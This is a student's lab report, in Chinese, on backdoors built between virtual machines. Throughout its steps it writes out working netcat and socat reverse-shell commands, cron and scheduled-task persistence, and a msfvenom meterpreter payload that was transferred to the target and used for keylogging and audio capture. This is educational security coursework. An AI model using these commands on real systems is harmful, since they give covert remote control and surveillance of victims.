20155323刘威良 网络对抗 Exp2 后门原理与实践

20155323 刘威良《网络攻防》Exp2后门原理与实践

实验内容

  • (1)使用netcat获取主机操作Shell,cron启动 (0.5分)
  • (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)
  • (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
  • (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
  • (5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

实验过程

  • windows获取shell

1.首先打开win7虚拟机,用命令行查询IP地址

1071523-20180403192901409-1065709840.png

2.然后打开命令行进入ncat目录下输入命令ncat.exe -l -p 5323开始监听

1071523-20180403193046271-16392031.png

3.接着打开Linux在命令行下输入命令nc 192.168.37.129 5323 -e /bin/sh反弹连接Win7

1071523-20180403193240693-794657795.png

4.然后Windows下获得一个linux shell,可运行任何指令,例如ls。

1071523-20180403193636330-476982349.png

  • Linux获得Win Shell

1.用ifconfig命令查看IP为192.168.37.128

1071523-20180403195028175-165951041.png

2.运行监听指令nc -l -p 5323

1071523-20180403195515444-495833917.png

3.在win7虚拟机ncat目录下输入命令ncat.exe -e cmd.exe 192.168.37.128 5323反弹连接Linux

1071523-20180404135423270-86420828.png

1071523-20180404135511251-1878593842.png

  • 使用netcat获取主机操作Shell,cron启动

1.Windows下监听5323端口
1071523-20180404135639450-408588089.png

2.在Linux系统内用命令行输入crontab -e并进入编辑界面

1071523-20180404135813251-1631846304.png

3.在最下面一行加上28 * * * * /bin/netcat 192.168.37.128 5323-e /bin/sh设置在28分时启动cron

1071523-20180404140135177-1735421755.png

4.28分后,windows7已经获得了Kali的shell,可以输入指令得到结果。

1071523-20180404140233984-807906694.png

  • 使用socat获取主机操作Shell, 任务计划启动

1.在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称为学号后,新建一个触发器并将开始任务设置为工作站锁定时。

2.在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5323 exec:cmd.exe,pty,stderr

1071523-20180404140324980-2128691792.png

3.双击打开刚刚设置好的触发器

1071523-20180404140343616-1166966059.png

4.在Kali环境下输入指令socat - tcp:192.168.37.129:5323,第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5323端口,此时可成功获得cmd shell

1071523-20180404140416101-559202756.png

  • 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.在kali中输入命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5323 -f exe > 20155323_backdoor.exe生成后门程序。然后通过nc指令将生成的后门程序传送到Windows主机上。(此处LHOST号应为Linux的IP地址,截图有误,后来正确操作时忘了补截图)。

1071523-20180404140433146-1830352577.png

2.在Windows7输入ncat.exe -lv 5323 > 20155323_backdoor.exe在Linux输入nc 192.168.37.129 5323 < 20155323_backdoor.exe将后门传输到Windows7系统中。

1071523-20180404140443837-1780288923.png

3.在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:

1071523-20180404140454848-69785898.png

1071523-20180404140506141-2065060920.png

4.设置完成后,执行监听并打开Windows7系统中的后门程序。

1071523-20180404140522791-4892497.png

5.此时我们已经可以执行截获音频、截屏、记录下击键的过程和读取击键的记录等操作。

1071523-20180404143602946-1943154189.png

1071523-20180404143631390-1138379982.png

1071523-20180404143654361-1821642074.png

6.但是在读取摄像头时出现了错误,这里不清楚是摄像头的问题还是驱动的问题,用虚拟机连接摄像头也连不上。

1071523-20180404143719627-866317595.png

1071523-20180404145542458-591185718.png

基础问题回答

  • (1)例举你能想到的一个后门进入到你系统中的可能方式?

下载未知程序到电脑上,或者插入了有问题的U盘。

  • (2)例举你知道的后门如何启动起来(win及linux)的方式?

将后门程序伪装成正常程序,用户在不知情的情况下打开就会启动后门。

  • (3)Meterpreter有哪些给你映像深刻的功能?

可以得到主机的大部分权限,掌握用户信息,让用户毫无隐私。

  • (4)如何发现自己有系统有没有被安装后门?

我的水平只能是用杀毒软件查一遍了,虽然不知道有没有用。。

实验体会

这次实验不难,但是在kali如何联网这个问题上纠结了很久,也查了很多方法都没用,卡在第一步很久,最后在老师的帮助下成功联网。另外实验简单也不能忽视细节,在把后门程序从kali传输到Windows7系统这步时由于我把kali的IP输成了Windows7的IP地址导致出错(两者非常像)。最后的摄像头连接也出现了问题,我猜是摄像头驱动没安装,毕竟之前没有用过电脑的这个功能,但是我在驱动精灵里没有发现这个驱动,所以没有进行进一步的学习。

转载于:https://www.cnblogs.com/fixedl/p/8705931.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值